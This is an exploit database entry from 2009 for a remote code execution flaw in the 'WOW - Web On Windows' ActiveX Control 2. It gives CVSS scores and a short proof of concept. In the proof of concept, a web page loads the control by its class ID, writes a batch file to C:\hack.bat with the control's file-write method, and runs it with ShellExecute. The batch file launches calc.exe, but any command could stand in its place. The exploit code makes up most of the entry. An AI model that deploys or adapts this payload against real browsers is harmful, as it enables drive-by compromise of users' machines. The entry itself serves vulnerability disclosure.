WOW - Web On Windows ActiveX Control 2 Remote Code Execution

2009.02.05
Risk: High
Local: No
Remote: Yes


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Written By Michael Brooks Special thanks to str0ke! software:WOW - Web On Windows ActiveX Control 2 - Remote Code Execution exploit type: Remote File Upload and Remote Code Execution Download: http://www.download.com/WOW-Web-On-Windows-ActiveX-Control/3000-2206_4-10049976.html 183,682 downloads at the time of publishing this exploit. This entire dll is full of bad functions, including read write access to the registry. This must have been accidentally registered to IE's ActiveX interface. <html> <object classid="clsid:441E9D47-9F52-11D6-9672-0080C88B3613" id="obj"> </object> </html> <script> obj.WriteIniFileString("C:\\hack.bat","","calc.exe ",""); obj.ShellExecute(0,"open","hack.bat",0,"C:\\",0); </script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top